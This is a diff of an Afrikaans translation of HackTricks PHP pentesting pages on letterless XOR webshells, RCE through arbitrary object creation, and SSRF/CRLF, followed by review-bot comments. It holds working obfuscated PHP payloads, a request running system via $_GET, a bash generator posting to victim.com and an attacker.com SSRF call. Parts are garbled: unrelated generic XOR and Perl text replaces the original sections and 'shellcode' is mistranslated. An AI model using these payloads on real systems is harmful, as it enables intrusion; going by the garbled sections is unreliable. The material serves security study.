@@ -339,64 +322,62 @@ echo "${Da}"; //Drums echo "$x ${$x}"; //Da Drums echo "$x ${Da}"; //Da Drums ``` +## RCE misbruik van nuwe $\_GET\["a"]\($\_GET\["b"]) -## RCE abusing new $\_GET\["a"]\($\_GET\["b"]) - -If in a page you can **create a new object of an arbitrary class** you might be able to obtain RCE, check the following page to learn how: +As jy op 'n bladsy 'n **nuwe voorwerp van 'n willekeurige klas kan skep**, kan jy moontlik RCE verkry. Kyk na die volgende bladsy om te leer hoe: {% content-ref url="php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md" %} [php-rce-abusing-object-creation-new-usd\_get-a-usd\_get-b.md](php-rce-abusing-object-creation-new-usd\_get-a-usd\_get-b.md) {% endcontent-ref %} -## Execute PHP without letters +## Voer PHP uit sonder letters [https://securityonline.info/bypass-waf-php-webshell-without-numbers-letters/](https://securityonline.info/bypass-waf-php-webshell-without-numbers-letters/) -### Using octal - +### Gebruik van oktaal ```php $_="\163\171\163\164\145\155(\143\141\164\40\56\160\141\163\163\167\144)"; #system(cat .passwd); ``` - ### **XOR** +XOR (Exclusive OR) is 'n logiese operasie wat gebruik word in kriptografie en rekenaarnetwerke. Dit is 'n bietjie-oor-bietjie operasie wat twee bietjiepatrone vergelyk en 'n nuwe bietjiepatroon genereer volgens 'n spesifieke reël. + +In kriptografie word XOR gebruik om data te versleutel en te ontsluit. Dit is 'n effektiewe manier om data te beskerm teen ongeoorloofde toegang. XOR kan ook gebruik word om data te versteek of te verberg. + +In rekenaarnetwerke word XOR gebruik om data te verifieer en te beskerm teen foutiewe oordrag. Dit kan gebruik word om data-integriteit te verseker en om te verseker dat data korrek oorgedra word. + +XOR is 'n nuttige tegniek wat in verskeie toepassings gebruik kan word. Dit is belangrik vir 'n hacker om die konsep van XOR te verstaan en hoe dit gebruik kan word in verskillende situasies. 
```php $_=("%28"^"[").("%33"^"[").("%34"^"[").("%2c"^"[").("%04"^"[").("%28"^"[").("%34"^"[").("%2e"^"[").("%29"^"[").("%38"^"[").("%3e"^"["); #show_source $__=("%0f"^"!").("%2f"^"_").("%3e"^"_").("%2c"^"_").("%2c"^"_").("%28"^"_").("%3b"^"_"); #.passwd $___=$__; #Could be not needed inside eval $_($___); #If ¢___ not needed then $_($__), show_source(.passwd) ``` +### XOR maklike skuldkode -### XOR easy shell code - -According to [**this writeup** ](https://mgp25.com/ctf/Web-challenge/)the following it's possible to generate an easy shellcode this way: - +Volgens [**hierdie skryfstuk**](https://mgp25.com/ctf/Web-challenge/) is dit moontlik om 'n maklike skuldkode op hierdie manier te genereer: ```php $_="`{{{"^"?<>/"; // $_ = '_GET'; ${$_}[_](${$_}[__]); // $_GET[_]($_GET[__]); $_="`{{{"^"?<>/";${$_}[_](${$_}[__]); // $_ = '_GET'; $_GET[_]($_GET[__]); ``` - -So, if you can **execute arbitrary PHP without numbers and letters** you can send a request like the following abusing that payload to execute arbitrary PHP: - +So, as jy **arbitrêre PHP sonder syfers en letters kan uitvoer**, kan jy 'n versoek stuur soos die volgende om misbruik te maak van daardie payload om arbitrêre PHP uit te voer: ``` POST: /action.php?_=system&__=cat+flag.php Content-Type: application/x-www-form-urlencoded comando=$_="`{{{"^"?<>/";${$_}[_](${$_}[__]); ``` +Vir 'n meer diepgaande verduideliking, kyk na [https://ctf-wiki.org/web/php/php/#preg\_match](https://ctf-wiki.org/web/php/php/#preg\_match) -For a more in depth explanation check [https://ctf-wiki.org/web/php/php/#preg\_match](https://ctf-wiki.org/web/php/php/#preg\_match) - -### XOR Shellcode (inside eval) - +### XOR Shellcode (binne eval) ```bash #!/bin/bash if [[ -z $1 ]]; then - echo "USAGE: $0 CMD" - exit +echo "USAGE: $0 CMD" +exit fi CMD=$1 
@@ -410,9 +391,63 @@ lt;>/'^'{{{{';\${\$_}[_](\${\$_}[__]);" `$_=' ```php lt;>/'^'{{{{'; --> _GET` `${$_}[_](${$_}[__]); --> $_GET[_]($_GET[__])` `So, the function is inside $_GET[_] and the parameter is inside $_GET[__]` http --form POST "http://victim.com/index.php?_=system&__=$CMD" "input=$CODE" ``` +### Perl soos -### Perl like +Perl is 'n kragtige skriptingtaal wat dikwels gebruik word vir webontwikkeling en stelseladministrasie. Dit bied 'n ryk stel funksies en biblioteke wat dit 'n gewilde keuse maak vir programmeerders. Hier is 'n paar Perl-truuks wat jy kan gebruik om jou webtoepassings te verbeter: +#### Regulêre uitdrukkings + +Perl bied 'n kragtige regulêre uitdrukkingsbiblioteek wat dit maklik maak om te soek, vervang en manipuleer in teks. Jy kan dit gebruik om patrone in jou webinhoud te vind en te verander. + +```perl +if ($string =~ /patroon/) { + # Doen iets as die patroon gevind word +} +``` + +#### CGI-programmering + +Perl is baie gewild vir CGI-programmering, wat dit moontlik maak om dinamiese webinhoud te skep. Jy kan vormdata ontvang en verwerk, en dit gebruik om dinamiese webbladsye te genereer. + +```perl +use CGI; + +my $cgi = CGI->new; +my $name = $cgi->param('name'); + +print $cgi->header; +print "Hallo, $name!"; +``` + +#### Databasisinteraksie + +Perl het 'n verskeidenheid databasisbiblioteke wat dit maklik maak om met databasisse te kommunikeer. Jy kan dit gebruik om data uit 'n databasis te haal, dit te wysig en nuwe data in te voeg. + +```perl +use DBI; + +my $dbh = DBI->connect("DBI:mysql:database=naam;host=host", "gebruiker", "wagwoord"); +my $sth = $dbh->prepare("SELECT * FROM tabelle"); +$sth->execute; + +while (my $row = $sth->fetchrow_hashref) { + # Doen iets met die data +} + +$dbh->disconnect; +``` + +#### Lêerhantering + +Perl bied 'n kragtige lêerhanteringsbiblioteek wat dit maklik maak om lêers te skep, te lees en te skryf. Jy kan dit gebruik om tekslêers te manipuleer of om lêers vanaf die bediener af te laai. 
+ +```perl +open(my $file, '>', 'lêernaam.txt'); +print $file "Inhoud van die lêer"; +close($file); +``` + +Hierdie is slegs 'n paar van die kragtige funksies wat Perl bied vir webontwikkeling. Deur hierdie truuks te gebruik, kan jy jou webtoepassings verbeter en meer doeltreffend maak. ```php -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke. diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md index b857dbe21..8095440a5 100644 --- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md +++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md @@ -1,42 +1,41 @@ -# PHP - RCE abusing object creation: new $\_GET\["a"]\($\_GET\["b"]) +# PHP - RCE misbruik van objek skepping: nuwe $\_GET\["a"]\($\_GET\["b"])
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hack vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-This is basically a summary of [https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) +Hierdie is basies 'n opsomming van [https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) -## Introduction +## Inleiding -The creation of new arbitrary objects, such as `new $_GET["a"]($_GET["a"])`, can lead to Remote Code Execution (RCE), as detailed in a [**writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/). This document highlights various strategies for achieving RCE. +Die skepping van nuwe willekeurige objekte, soos `new $_GET["a"]($_GET["a"])`, kan lei tot Remote Code Execution (RCE), soos in 'n [**writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) beskryf. Hierdie dokument beklemtoon verskeie strategieë om RCE te bereik. -## RCE via Custom Classes or Autoloading +## RCE via Aangepaste Klasse of Autoloading -The syntax `new $a($b)` is used to instantiate an object where **`$a`** represents the class name and **`$b`** is the first argument passed to the constructor. These variables can be sourced from user inputs like GET/POST, where they may be strings or arrays, or from JSON, where they might present as other types. - -Consider the code snippet below: +Die sintaksis `new $a($b)` word gebruik om 'n objek te instansieer waar **`$a`** die klasnaam verteenwoordig en **`$b`** die eerste argument is wat aan die konstrukteur oorgedra word. Hierdie veranderlikes kan afkomstig wees van gebruikersinsette soos GET/POST, waar hulle strings of rye kan wees, of van JSON, waar hulle as ander tipes kan voorkom. 
+Beskou die onderstaande kodefragment: ```php class App { - function __construct ($cmd) { - system($cmd); - } +function __construct ($cmd) { +system($cmd); +} } class App2 { - function App2 ($cmd) { - system($cmd); - } +function App2 ($cmd) { +system($cmd); +} } $a = $_GET['a']; 
@@ -44,85 +43,78 @@ $b = $_GET['b']; new $a($b); ``` +In hierdie geval, as `$a` ingestel word op `App` of `App2` en `$b` op 'n stelselopdrag (bv. `uname -a`), sal dit lei tot die uitvoering van daardie opdrag. -In this instance, setting `$a` to `App` or `App2` and `$b` to a system command (e.g., `uname -a`) results in the execution of that command. - -**Autoloading functions** can be exploited if no such classes are directly accessible. These functions automatically load classes from files when needed and are defined using `spl_autoload_register` or `__autoload`: - +**Autoloading funksies** kan uitgebuit word as daar geen sulke klasse direk toeganklik is nie. Hierdie funksies laai outomaties klasse van lêers wanneer dit nodig is en word gedefinieer met behulp van `spl_autoload_register` of `__autoload`: ```php spl_autoload_register(function ($class_name) { - include './../classes/' . $class_name . '.php'; +include './../classes/' . $class_name . '.php'; }); function __autoload($class_name) { - include $class_name . '.php'; +include $class_name . '.php'; }; spl_autoload_register(); ``` +Die gedrag van outoloading verskil met PHP-weergawes en bied verskillende RCE-moontlikhede. -The behavior of autoloading varies with PHP versions, offering different RCE possibilities. +## RCE via Ingeboude Klasse -## RCE via Built-In Classes +As daar nie aangepaste klasse of outoloaders is nie, kan **ingeboude PHP-klasse** voldoende wees vir RCE. Die aantal van hierdie klasse wissel tussen 100 en 200, gebaseer op die PHP-weergawe en uitbreidings. Hulle kan gelys word deur gebruik te maak van `get_declared_classes()`. -Lacking custom classes or autoloaders, **built-in PHP classes** may suffice for RCE. The number of these classes ranges between 100 to 200, based on PHP version and extensions. They can be listed using `get_declared_classes()`. 
+Konstruksies van belang kan geïdentifiseer word deur die refleksie API, soos getoon in die volgende voorbeeld en die skakel [https://3v4l.org/2JEGF](https://3v4l.org/2JEGF). -Constructors of interest can be identified through the reflection API, as shown in the following example and the link [https://3v4l.org/2JEGF](https://3v4l.org/2JEGF). +**RCE via spesifieke metodes sluit in:** -**RCE via specific methods includes:** - -### **SSRF + Phar Deserialization** - -The `SplFileObject` class enables SSRF through its constructor, allowing connections to any URL: +### **SSRF + Phar Deserialisering** +Die `SplFileObject`-klas maak SSRF moontlik deur middel van sy konstrukteur, wat verbinding met enige URL toelaat: ```php new SplFileObject('http://attacker.com/'); ``` +SSRF kan lei tot deserialisasie-aanvalle in weergawes van PHP voor 8.0 deur die gebruik van die Phar-protokol. -SSRF can lead to deserialization attacks in versions of PHP before 8.0 using the Phar protocol. - -### **Exploiting PDOs** - -The PDO class constructor allows connections to databases via DSN strings, potentially enabling file creation or other interactions: +### **Uitbuiting van PDO's** +Die konstrukteur van die PDO-klas maak dit moontlik om verbinding met databasisse te maak deur middel van DSN-reekse, wat potensieel die skep van lêers of ander interaksies moontlik maak: ```php new PDO("sqlite:/tmp/test.txt") ``` - ### **SoapClient/SimpleXMLElement XXE** -Versions of PHP up to 5.3.22 and 5.4.12 were susceptible to XXE attacks through the `SoapClient` and `SimpleXMLElement` constructors, contingent on the version of libxml2. +Weergawes van PHP tot 5.3.22 en 5.4.12 was vatbaar vir XXE-aanvalle deur die `SoapClient` en `SimpleXMLElement` konstruksies, afhangende van die weergawe van libxml2. 
-## RCE via Imagick Extension +## RCE via Imagick-uitbreiding -In the analysis of a **project's dependencies**, it was discovered that **Imagick** could be leveraged for **command execution** by instantiating new objects. This presents an opportunity for exploiting vulnerabilities. +In die analise van 'n projek se afhanklikhede is ontdek dat Imagick gebruik kan word vir beveluitvoering deur nuwe objekte te instansieer. Dit bied 'n geleentheid vir die uitbuiting van kwesbaarhede. -### VID parser +### VID-parser -The VID parser capability of writing content to any specified path in the filesystem was identified. This could lead to the placement of a PHP shell in a web-accessible directory, achieving Remote Code Execution (RCE). +Die VID-parser-vermoë om inhoud na enige gespesifiseerde pad in die lêersisteem te skryf, is geïdentifiseer. Dit kan lei tot die plasing van 'n PHP-skulp in 'n web-toeganklike gids, wat Remote Code Execution (RCE) bereik. -#### VID Parser + File Upload +#### VID-parser + Lêeroplaai -It's noted that PHP temporarily stores uploaded files in `/tmp/phpXXXXXX`. The VID parser in Imagick, utilizing the **msl** protocol, can handle wildcards in file paths, facilitating the transfer of the temporary file to a chosen location. This method offers an additional approach to achieve arbitrary file writing within the filesystem. +Dit moet opgemerk word dat PHP opgelaaide lêers tydelik in `/tmp/phpXXXXXX` stoor. Die VID-parser in Imagick, wat die **msl**-protokol gebruik, kan wildcards in lêer-paaie hanteer, wat die oordrag van die tydelike lêer na 'n gekose plek fasiliteer. Hierdie metode bied 'n addisionele benadering om arbitrêre lêerskryf binne die lêersisteem te bereik. ### PHP Crash + Brute Force -A method described in the [**original writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) involves uploading files that trigger a server crash before deletion. 
By brute-forcing the name of the temporary file, it becomes possible for Imagick to execute arbitrary PHP code. However, this technique was found to be effective only in an outdated version of ImageMagick. +'n Metode wat in die [**oorspronklike skryfstuk**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) beskryf word, behels die oplaai van lêers wat 'n bedienercrash veroorsaak voordat dit uitgewis word. Deur die naam van die tydelike lêer met brute force te raai, word dit moontlik vir Imagick om arbitrêre PHP-kode uit te voer. Hierdie tegniek was egter slegs effektief in 'n verouderde weergawe van ImageMagick. -## References +## Verwysings * [https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
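Review bot: in the `class App` / `class App2` block at the top of this hunk the leading indentation of every method body is stripped (`-    function __construct ($cmd) {` becomes `+function __construct ($cmd) {`, likewise for the `system($cmd);` lines and the closing braces). A translation commit should not change bytes inside a fenced code block; please restore the four-space indentation so the diff shows only prose changes.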
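Review bot: "Constructors of interest" and "the `SoapClient` and `SimpleXMLElement` constructors" are rendered as "Konstruksies van belang" and "`SoapClient` en `SimpleXMLElement` konstruksies" in the `@@ -44,85 +43,78 @@` hunk; "konstruksies" means constructions, the PHP term is "konstrukteurs", which the same hunk already uses for `SplFileObject` and PDO. Two smaller points in the same hunk: the bold on **Imagick** and **command execution** in the "RCE via Imagick-uitbreiding" paragraph is dropped, and the blank lines that separated headings and prose from the ```php fences are removed, which changes layout for no translation reason.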
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md index 51d5d97ad..c5f171820 100644 --- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md +++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md @@ -2,43 +2,40 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy hulle vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} *** -### SSRF PHP functions - -Some function such as _**file\_get\_contents(), fopen(), file(), md5\_file()**accept URLs as input that they will follow making **possible SSRF vulnerabilities** if the use can control the data: +### SSRF PHP-funksies +Sommige funksies soos _**file\_get\_contents(), fopen(), file(), md5\_file()**aanvaar URL's as insette wat hulle sal volg en **moontlike SSRF-kwesbaarhede** kan veroorsaak as die gebruiker die data kan beheer: ```php file_get_contents("http://127.0.0.1:8081"); fopen("http://127.0.0.1:8081", "r"); file("http://127.0.0.1:8081"); md5_file("http://127.0.0.1:8081"); ``` - ### CRLF -Moreover, in some cases it might be even possible to send arbitrary headers via CRLF "vulnerabilities" in the previous functions: - +Verder, in sommige gevalle is dit selfs moontlik om arbitrêre koppe via CRLF "kwesbaarhede" in die vorige funksies te stuur: ```php -# The following will create a header called from with value Hi and +# The following will create a header called from with value Hi and # an extra header "Injected: I HAVE IT" ini_set("from", "Hi\r\nInjected: I HAVE IT"); file_get_contents("http://127.0.0.1:8081"); 
@@ -51,46 +48,43 @@ Connection: close # Any of the previously mentioned functions will send those headers ``` - {% hint style="warning" %} -For more info about that CRLF vuln, check this bug [https://bugs.php.net/bug.php?id=81680\&edit=1](https://bugs.php.net/bug.php?id=81680\&edit=1) +Vir meer inligting oor daardie CRLF kwesbaarheid, kyk na hierdie fout [https://bugs.php.net/bug.php?id=81680\&edit=1](https://bugs.php.net/bug.php?id=81680\&edit=1) {% endhint %} -Note that these function might have other methods to set arbitrary headers in requests, like: - +Let daarop dat hierdie funksie ander metodes kan hê om willekeurige koppe in versoeke te stel, soos: ```php $url = ""; $options = array( - 'http'=>array( - 'method'=>"GET", - 'header'=>"Accept-language: en\r\n" . - "Cookie: foo=bar\r\n" . // check function.stream-context-create on php.net - "User-Agent: Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.102011-10-16 20:23:10\r\n" // i.e. An iPad - ) +'http'=>array( +'method'=>"GET", +'header'=>"Accept-language: en\r\n" . +"Cookie: foo=bar\r\n" . // check function.stream-context-create on php.net +"User-Agent: Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.102011-10-16 20:23:10\r\n" // i.e. An iPad +) ); $context = stream_context_create($options); $file = file_get_contents($url, false, $context); ``` -
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
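Review bot: the broken emphasis in the "SSRF PHP-funksies" paragraph is carried over unchanged: `_**file\_get\_contents(), fopen(), file(), md5\_file()**aanvaar` opens an italic underscore that is never closed and glues the closing `**` to the next word, so the rest of the line renders in italics. Since the line is rewritten anyway, close the markup, e.g. `**file\_get\_contents(), fopen(), file(), md5\_file()** aanvaar`. The blank lines before the two ```php fences in this hunk are also removed without a translation reason.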
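Review bot: "Let daarop dat hierdie funksie ander metodes kan hê" in the `@@ -51,46 +48,43 @@` hunk keeps the source's number error ("these function"); the sentence refers to all the functions listed above, so it should read "hierdie funksies ... kan hê". In the same hunk the `$options` array passed to `stream_context_create` loses its indentation (`-    'http'=>array(` becomes `+'http'=>array(`), a code-only change that does not belong in a translation commit.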
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md index 74c88377e..00929b0dd 100644 --- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md +++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md @@ -1,91 +1,97 @@ -# PHP - Useful Functions & disable\_functions/open\_basedir bypass +# PHP - Nuttige Funksies & disable\_functions/open\_basedir omseil
